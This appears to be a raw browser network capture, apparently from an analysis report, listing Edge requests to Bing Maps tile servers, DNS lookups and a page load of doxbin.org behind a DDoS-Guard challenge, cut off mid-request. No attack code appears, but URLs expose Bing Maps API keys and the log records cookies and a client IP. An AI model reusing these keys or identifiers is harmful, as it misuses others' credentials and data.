sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 20650
content-type: image/png
last-modified: Tue, 12 Nov 2024 06:09:54 GMT
etag: "14792"
server: Kestrel
access-control-allow-origin: *
access-control-expose-headers: X-VE-TILEMETA-CaptureDatesRange, X-VE-TILEMETA-CaptureDateMaxYYMM
x-ve-tfe: DUB0016442
x-ve-aztbe: DUB001648A
x-ve-ac: 5033
x-ve-id: 8030_165660141
x-ve-tilemeta-capturedatesrange: 4/1/1900-4/1/2100
x-ve-tilemeta-capturedatemaxyymm: 0004
x-ve-server-tfe: DUBEEAP0001648A
x-ve-server-aztbe: DUBEEAP0001648A
x-powered-by: ASP.NET
x-ve-server-tfe: DUBEEAP00016442
x-ve-server-aztbe: DUBEEAP00016442
cache-control: public, max-age=29752139
expires: Thu, 13 Nov 2025 18:37:17 GMT
date: Wed, 04 Dec 2024 10:08:18 GMT
GET

https://t.ssl.ak.tiles.virtualearth.net/tiles/sre03131313112?g=14792&n=t

msedge.exe

Remote address:

23.73.138.225:443

Request

GET /tiles/sre03131313112?g=14792&n=t HTTP/2.0
host: t.ssl.ak.tiles.virtualearth.net
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 21901
content-type: image/png
last-modified: Tue, 12 Nov 2024 06:09:54 GMT
etag: "14792"
server: Kestrel
access-control-allow-origin: *
access-control-expose-headers: X-VE-TILEMETA-CaptureDatesRange, X-VE-TILEMETA-CaptureDateMaxYYMM
x-ve-tfe: DUB0016467
x-ve-aztbe: DUB0016445
x-ve-ac: 5033
x-ve-id: 8030_165628287
x-ve-tilemeta-capturedatesrange: 4/1/1900-4/1/2100
x-ve-tilemeta-capturedatemaxyymm: 0004
x-ve-server-tfe: DUBEEAP00016445
x-ve-server-aztbe: DUBEEAP00016445
x-powered-by: ASP.NET
x-ve-server-tfe: DUBEEAP00016467
x-ve-server-aztbe: DUBEEAP00016467
cache-control: public, max-age=29752162
expires: Thu, 13 Nov 2025 18:37:40 GMT
date: Wed, 04 Dec 2024 10:08:18 GMT
GET

https://t.ssl.ak.tiles.virtualearth.net/tiles/sre12020202000?g=14792&n=t

msedge.exe

Remote address:

23.73.138.225:443

Request

GET /tiles/sre12020202000?g=14792&n=t HTTP/2.0
host: t.ssl.ak.tiles.virtualearth.net
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 14948
content-type: image/png
last-modified: Tue, 12 Nov 2024 06:09:54 GMT
etag: "14792"
server: Kestrel
access-control-allow-origin: *
access-control-expose-headers: X-VE-TILEMETA-CaptureDatesRange, X-VE-TILEMETA-CaptureDateMaxYYMM
x-ve-tfe: DUB0016481
x-ve-aztbe: DUB0016466
x-ve-ac: 5033
x-ve-id: 8030_165655297
x-ve-tilemeta-capturedatesrange: 4/1/1900-4/1/2100
x-ve-tilemeta-capturedatemaxyymm: 0004
x-ve-server-aztbe: DUBEEAP00016466
x-ve-server-tfe: DUBEEAP00016466
x-powered-by: ASP.NET
x-ve-server-tfe: DUBEEAP00016481
x-ve-server-aztbe: DUBEEAP00016481
cache-control: public, max-age=29752167
expires: Thu, 13 Nov 2025 18:37:45 GMT
date: Wed, 04 Dec 2024 10:08:18 GMT
GET

https://t.ssl.ak.tiles.virtualearth.net/tiles/sre12020202002?g=14792&n=t

msedge.exe

Remote address:

23.73.138.225:443

Request

GET /tiles/sre12020202002?g=14792&n=t HTTP/2.0
host: t.ssl.ak.tiles.virtualearth.net
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 24750
content-type: image/png
last-modified: Tue, 12 Nov 2024 06:09:54 GMT
etag: "14792"
server: Kestrel
access-control-allow-origin: *
access-control-expose-headers: X-VE-TILEMETA-CaptureDatesRange, X-VE-TILEMETA-CaptureDateMaxYYMM
x-ve-tfe: DUB00094C6
x-ve-aztbe: DUB00094C7
x-ve-ac: 5033
x-ve-id: 8030_165639343
x-ve-tilemeta-capturedatesrange: 4/1/1900-4/1/2100
x-ve-tilemeta-capturedatemaxyymm: 0004
x-ve-server-tfe: DUBEEAP000094C7
x-ve-server-aztbe: DUBEEAP000094C7
x-powered-by: ASP.NET
x-ve-server-tfe: DUBEEAP000094C6
x-ve-server-aztbe: DUBEEAP000094C6
cache-control: public, max-age=29752176
expires: Thu, 13 Nov 2025 18:37:54 GMT
date: Wed, 04 Dec 2024 10:08:18 GMT
GET

https://t.ssl.ak.tiles.virtualearth.net/tiles/sre03131313113?g=14792&n=t

msedge.exe

Remote address:

23.73.138.225:443

Request

GET /tiles/sre03131313113?g=14792&n=t HTTP/2.0
host: t.ssl.ak.tiles.virtualearth.net
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 17919
content-type: image/png
last-modified: Tue, 12 Nov 2024 06:09:54 GMT
etag: "14792"
server: Kestrel
access-control-allow-origin: *
access-control-expose-headers: X-VE-TILEMETA-CaptureDatesRange, X-VE-TILEMETA-CaptureDateMaxYYMM
x-ve-tfe: DUB001644C
x-ve-aztbe: DUB0016443
x-ve-ac: 5033
x-ve-id: 8030_165644210
x-ve-tilemeta-capturedatesrange: 4/1/1900-4/1/2100
x-ve-tilemeta-capturedatemaxyymm: 0004
x-ve-server-tfe: DUBEEAP00016443
x-ve-server-aztbe: DUBEEAP00016443
x-powered-by: ASP.NET
x-ve-server-tfe: DUBEEAP0001644C
x-ve-server-aztbe: DUBEEAP0001644C
cache-control: public, max-age=29752182
expires: Thu, 13 Nov 2025 18:38:00 GMT
date: Wed, 04 Dec 2024 10:08:18 GMT
GET

https://t.ssl.ak.tiles.virtualearth.net/tiles/cmd/BirdsEyeSceneMetaData?north=51.6198525907427&south=51.4198525907427&east=-0.008489990234374994&west=-0.208489990234375&count=100&g=11124&dir=&ver=0

msedge.exe

Remote address:

23.73.138.225:443

Request

GET /tiles/cmd/BirdsEyeSceneMetaData?north=51.6198525907427&south=51.4198525907427&east=-0.008489990234374994&west=-0.208489990234375&count=100&g=11124&dir=&ver=0 HTTP/2.0
host: t.ssl.ak.tiles.virtualearth.net
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 32726
content-type: text/plain
content-encoding: gzip
server: Kestrel
access-control-allow-origin: *
x-ve-tfe: DUB0016477
x-powered-by: ASP.NET
x-ve-server-tfe: DUBEEAP00016477
x-ve-server-aztbe: DUBEEAP00016477
cache-control: public, max-age=1034
expires: Wed, 04 Dec 2024 10:25:33 GMT
date: Wed, 04 Dec 2024 10:08:19 GMT
vary: Accept-Encoding
GET

https://t.ssl.ak.tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?count=500&north=51.583896602976495&south=51.45571839040852&east=0.02883911132764183&west=-0.24581909179784134&key=AlsPah6FU95S91QfKxKIrg5i97ocZvZDopAQrElSZJzf5uMxZiRuUiZlAt5dDtEK&g=14848

msedge.exe

Remote address:

23.73.138.225:443

Request

GET /tiles/cmd/StreetSideBubbleMetaData?count=500&north=51.583896602976495&south=51.45571839040852&east=0.02883911132764183&west=-0.24581909179784134&key=AlsPah6FU95S91QfKxKIrg5i97ocZvZDopAQrElSZJzf5uMxZiRuUiZlAt5dDtEK&g=14848 HTTP/2.0
host: t.ssl.ak.tiles.virtualearth.net
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 20340
content-type: text/plain
content-encoding: gzip
server: Kestrel
access-control-allow-origin: *
x-ve-tfe: DUB0016466
x-powered-by: ASP.NET
x-ve-server-aztbe: DUBEEAP00016466
x-ve-server-tfe: DUBEEAP00016466
cache-control: public, max-age=2872
expires: Wed, 04 Dec 2024 10:56:11 GMT
date: Wed, 04 Dec 2024 10:08:19 GMT
vary: Accept-Encoding
GET

https://t.ssl.ak.tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?count=500&north=51.583896602976495&south=51.45571839040852&east=0.02883911132764183&west=-0.24581909179784134&key=AjU_16GwO6ItEGYEwnGxFdX73pxPEMeHN1suGnUoIAMqnrAK0tx4DcvG1-BEuCe3&g=14848

msedge.exe

Remote address:

23.73.138.225:443

Request

GET /tiles/cmd/StreetSideBubbleMetaData?count=500&north=51.583896602976495&south=51.45571839040852&east=0.02883911132764183&west=-0.24581909179784134&key=AjU_16GwO6ItEGYEwnGxFdX73pxPEMeHN1suGnUoIAMqnrAK0tx4DcvG1-BEuCe3&g=14848 HTTP/2.0
host: t.ssl.ak.tiles.virtualearth.net
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 20340
content-type: text/plain
content-encoding: gzip
server: Kestrel
access-control-allow-origin: *
x-ve-tfe: DUB0016466
x-powered-by: ASP.NET
x-ve-server-aztbe: DUBEEAP00016466
x-ve-server-tfe: DUBEEAP00016466
cache-control: public, max-age=2840
expires: Wed, 04 Dec 2024 10:56:11 GMT
date: Wed, 04 Dec 2024 10:08:51 GMT
vary: Accept-Encoding
DNS

237.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

237.197.79.204.in-addr.arpa

IN PTR

Response
DNS

dev.virtualearth.net

Remote address:

8.8.8.8:53

Request

dev.virtualearth.net

IN A

Response

dev.virtualearth.net

IN CNAME

fe-bmplatform-aks-atm.trafficmanager.net

fe-bmplatform-aks-atm.trafficmanager.net

IN CNAME

mapsplatformafd-prod-amafg5e8b7e6f6ez.z01.azurefd.net

mapsplatformafd-prod-amafg5e8b7e6f6ez.z01.azurefd.net

IN CNAME

star-azurefd-prod.trafficmanager.net

star-azurefd-prod.trafficmanager.net

IN CNAME

shed.dual-low.s-part-0036.t-0009.t-msedge.net

shed.dual-low.s-part-0036.t-0009.t-msedge.net

IN CNAME

s-part-0036.t-0009.t-msedge.net

s-part-0036.t-0009.t-msedge.net

IN A

13.107.246.64
DNS

t.ssl.ak.tiles.virtualearth.net

Remote address:

8.8.8.8:53

Request

t.ssl.ak.tiles.virtualearth.net

IN A

Response

t.ssl.ak.tiles.virtualearth.net

IN CNAME

t.ssl.ak.tiles.virtualearth.net.akamaized.net

t.ssl.ak.tiles.virtualearth.net.akamaized.net

IN CNAME

a505.dscg2.akamai.net

a505.dscg2.akamai.net

IN A

23.73.138.195

a505.dscg2.akamai.net

IN A

23.73.138.225
DNS

t.ssl.ak.tiles.virtualearth.net

Remote address:

8.8.8.8:53

Request

t.ssl.ak.tiles.virtualearth.net

IN A

Response

t.ssl.ak.tiles.virtualearth.net

IN CNAME

t.ssl.ak.tiles.virtualearth.net.akamaized.net

t.ssl.ak.tiles.virtualearth.net.akamaized.net

IN CNAME

a505.dscg2.akamai.net

a505.dscg2.akamai.net

IN A

23.73.138.225

a505.dscg2.akamai.net

IN A

23.73.138.195
GET

https://dev.virtualearth.net/REST/V1/Imagery/Copyright/en-GB/RoadOnDemand/11/51.45571839040852/-0.24581909179784134/51.583896602976495/0.02883911132764183?output=json&dir=0&jsonp=Microsoft.Maps.NetworkCallbacks.normal&jsonso=6f423&key=AlsPah6FU95S91QfKxKIrg5i97ocZvZDopAQrElSZJzf5uMxZiRuUiZlAt5dDtEK&ml=B,BF&ur=gb&c=en-GB&setfeatures=

msedge.exe

Remote address:

13.107.246.64:443

Request

GET /REST/V1/Imagery/Copyright/en-GB/RoadOnDemand/11/51.45571839040852/-0.24581909179784134/51.583896602976495/0.02883911132764183?output=json&dir=0&jsonp=Microsoft.Maps.NetworkCallbacks.normal&jsonso=6f423&key=AlsPah6FU95S91QfKxKIrg5i97ocZvZDopAQrElSZJzf5uMxZiRuUiZlAt5dDtEK&ml=B,BF&ur=gb&c=en-GB&setfeatures= HTTP/2.0
host: dev.virtualearth.net
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Wed, 04 Dec 2024 10:08:18 GMT
content-type: application/x-javascript; charset=utf-8
content-length: 780
access-control-allow-headers: Content-Type,X-FD-Features,X-FD-FLIGHT,PreferAnonymous
access-control-allow-methods: POST, GET, OPTIONS
access-control-allow-origin: *
alt-svc: h3=":443"; ma=86400
cache-control: no-cache
x-bm-traceid: f8bac1bfbae1aaa68314cd32d3190c0d
x-bm-srv: mapsplatform-frontend-b64849bbd-58lgl, mapsplatform-imagery-service-645d78b797-4dfzc
x-ms-bm-ws-info: 0
x-bm-fe-elapsed: 72
x-azure-ref: 20241204T100818Z-er1bd968f9crqkk9hC1LONy7y00000000rr000000000s7gq
aks_4209_weight: 100
x-cache: CONFIG_NOCACHE
accept-ranges: bytes
GET

https://dev.virtualearth.net/REST/V1/Imagery/Copyright/en-GB/RoadOnDemand/11/51.45571839040852/-0.24581909179784134/51.583896602976495/0.02883911132764183?output=json&dir=0&jsonp=Microsoft.Maps.NetworkCallbacks.normal&jsonso=6de6e&key=AjU_16GwO6ItEGYEwnGxFdX73pxPEMeHN1suGnUoIAMqnrAK0tx4DcvG1-BEuCe3&ml=B,BF&ur=gb&c=en-GB&setfeatures=

msedge.exe

Remote address:

13.107.246.64:443

Request

GET /REST/V1/Imagery/Copyright/en-GB/RoadOnDemand/11/51.45571839040852/-0.24581909179784134/51.583896602976495/0.02883911132764183?output=json&dir=0&jsonp=Microsoft.Maps.NetworkCallbacks.normal&jsonso=6de6e&key=AjU_16GwO6ItEGYEwnGxFdX73pxPEMeHN1suGnUoIAMqnrAK0tx4DcvG1-BEuCe3&ml=B,BF&ur=gb&c=en-GB&setfeatures= HTTP/2.0
host: dev.virtualearth.net
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Wed, 04 Dec 2024 10:08:51 GMT
content-type: application/x-javascript; charset=utf-8
content-length: 780
access-control-allow-headers: Content-Type,X-FD-Features,X-FD-FLIGHT,PreferAnonymous
access-control-allow-methods: POST, GET, OPTIONS
access-control-allow-origin: *
alt-svc: h3=":443"; ma=86400
cache-control: no-cache
x-bm-traceid: 717b2b1c01323ab9b677f3252bb2d9d5
x-bm-srv: mapsplatform-frontend-b64849bbd-dj7zb, mapsplatform-imagery-service-645d78b797-rrddj
x-ms-bm-ws-info: 0
x-bm-fe-elapsed: 149
x-azure-ref: 20241204T100851Z-er1bd968f9crqkk9hC1LONy7y00000000rr000000000shtg
aks_4209_weight: 100
x-cache: CONFIG_NOCACHE
accept-ranges: bytes
GET

https://landmark3dweb.azureedge.net/flyovers/version.txt

msedge.exe

Remote address:

13.107.246.64:443

Request

GET /flyovers/version.txt HTTP/2.0
host: landmark3dweb.azureedge.net
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Wed, 04 Dec 2024 10:08:18 GMT
content-type: text/plain
content-length: 7
last-modified: Tue, 03 Dec 2024 18:39:49 GMT
etag: 0x8DD13C9DE661FE1
x-ms-request-id: 92d9546c-001e-0059-05b3-451a19000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
x-azure-ref: 20241204T100818Z-er1bd968f9cjgdsfhC1LON9xwc0000000r7g00000001h76b
x-fd-int-roxy-purgeid: 80341353
x-cache: TCP_HIT
accept-ranges: bytes
GET

https://landmark3dweb.azureedge.net/flyovers/1.0.383/_flyovers.json

msedge.exe

Remote address:

13.107.246.64:443

Request

GET /flyovers/1.0.383/_flyovers.json HTTP/2.0
host: landmark3dweb.azureedge.net
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Wed, 04 Dec 2024 10:08:18 GMT
content-type: application/json
vary: Accept-Encoding
last-modified: Mon, 02 Dec 2024 12:26:59 GMT
x-ms-request-id: d172b43a-e01e-0035-73b3-45b1ca000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
x-azure-ref: 20241204T100818Z-er1bd968f9cjgdsfhC1LON9xwc0000000r7g00000001h78b
x-fd-int-roxy-purgeid: 80341353
x-cache: TCP_HIT
content-encoding: br
GET

http://doxbin.org/

msedge.exe

Remote address:

91.215.42.4:80

Request

GET / HTTP/1.1
Host: doxbin.org
Connection: keep-alive
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 301 Moved Permanently

Server: ddos-guard
Date: Wed, 04 Dec 2024 10:08:39 GMT
Connection: keep-alive
Keep-Alive: timeout=60
Set-Cookie: __ddg8_=oookXU6D4kHQux0O; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:39 GMT
Set-Cookie: __ddg9_=181.215.176.83; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:39 GMT
Set-Cookie: __ddg10_=1733306919; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:39 GMT
Location: https://doxbin.org/
Content-Type: text/html; charset=utf-8
Content-Length: 568
GET

https://doxbin.org/

msedge.exe

Remote address:

91.215.42.4:443

Request

GET / HTTP/2.0
host: doxbin.org
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __ddg8_=oookXU6D4kHQux0O
cookie: __ddg9_=181.215.176.83
cookie: __ddg10_=1733306919

Response

HTTP/2.0 403

server: ddos-guard
date: Wed, 04 Dec 2024 10:08:40 GMT
set-cookie: __ddg8_=Jn6nNOWMnbHq26eX; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:40 GMT
set-cookie: __ddg9_=181.215.176.83; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:40 GMT
set-cookie: __ddg10_=1733306920; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:40 GMT
set-cookie: __ddgid_=BOrUF1P5N9U3NFnX; Domain=.doxbin.org; HttpOnly; Path=/; Expires=Thu, 04-Dec-2025 10:08:40 GMT
set-cookie: __ddgmark_=0CHaen397WYWHdAI; Domain=.doxbin.org; HttpOnly; Path=/; Expires=Thu, 05-Dec-2024 10:08:40 GMT
set-cookie: __ddg5_=praufnpl8jzCLK0L; Domain=.doxbin.org; Path=/; HttpOnly; Expires=Wed, 04-Dec-2024 13:08:40 GMT
cache-control: no-cache, no-store, must-revalidate
content-type: text/html; charset=UTF-8
content-length: 41830
GET

https://doxbin.org/.well-known/ddos-guard/check?context=free_splash

msedge.exe

Remote address:

91.215.42.4:443

Request

GET /.well-known/ddos-guard/check?context=free_splash HTTP/2.0
host: doxbin.org
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://doxbin.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __ddg9_=181.215.176.83
cookie: __ddg8_=Jn6nNOWMnbHq26eX
cookie: __ddg10_=1733306920
cookie: __ddgid_=BOrUF1P5N9U3NFnX
cookie: __ddgmark_=0CHaen397WYWHdAI
cookie: __ddg5_=praufnpl8jzCLK0L

Response

HTTP/2.0 200

server: ddos-guard
date: Wed, 04 Dec 2024 10:08:40 GMT
content-type: application/javascript
expires: Wed, 04 Dec 2024 11:08:40 GMT
content-length: 148588
GET

https://doxbin.org/.well-known/ddos-guard/id/i01KOlwbXtN3c1Hx

msedge.exe

Remote address:

91.215.42.4:443

Request

GET /.well-known/ddos-guard/id/i01KOlwbXtN3c1Hx HTTP/2.0
host: doxbin.org
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://doxbin.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __ddg9_=181.215.176.83
cookie: __ddg8_=Jn6nNOWMnbHq26eX
cookie: __ddg10_=1733306920
cookie: __ddgid_=BOrUF1P5N9U3NFnX
cookie: __ddgmark_=0CHaen397WYWHdAI
cookie: __ddg5_=praufnpl8jzCLK0L

Response

HTTP/2.0 200

server: ddos-guard
date: Wed, 04 Dec 2024 10:08:41 GMT
content-type: image/png
expires: Thu, 01 Jan 1970 00:00:00 GMT
cache-control: no-cache
set-cookie: __ddg2_=i01KOlwbXtN3c1Hx; Domain=doxbin.org; Path=/; HttpOnly; Expires=Thu, 04-Dec-2025 10:08:41 GMT
content-length: 68
GET

https://doxbin.org/favicon.ico

msedge.exe

Remote address:

91.215.42.4:443

Request

GET /favicon.ico HTTP/2.0
host: doxbin.org
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://doxbin.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __ddg9_=181.215.176.83
cookie: __ddg8_=Jn6nNOWMnbHq26eX
cookie: __ddg10_=1733306920
cookie: __ddgid_=BOrUF1P5N9U3NFnX
cookie: __ddgmark_=0CHaen397WYWHdAI
cookie: __ddg5_=praufnpl8jzCLK0L
cookie: __ddg2_=i01KOlwbXtN3c1Hx

Response

HTTP/2.0 404

server: ddos-guard
set-cookie: __ddg8_=jWTBSlSAce72gPy9; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:41 GMT
set-cookie: __ddg9_=181.215.176.83; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:41 GMT
set-cookie: __ddg10_=1733306921; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:41 GMT
content-security-policy: upgrade-insecure-requests;
set-cookie: __ddg1_=7blbsAkRyxKwVq6BSmEx; Domain=.doxbin.org; HttpOnly; Path=/; Expires=Thu, 04-Dec-2025 10:08:41 GMT
date: Wed, 04 Dec 2024 10:08:41 GMT
content-type: text/html; charset=UTF-8
x-powered-by: PHP/8.2.26
x-frame-options: DENY
cache-control: no-cache, private
content-encoding: br
age: 0
ddg-cache-status: MISS
POST

https://doxbin.org/.well-known/ddos-guard/mark/

msedge.exe

Remote address:

91.215.42.4:443

Request

POST /.well-known/ddos-guard/mark/ HTTP/2.0
host: doxbin.org
content-length: 58334
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://doxbin.org
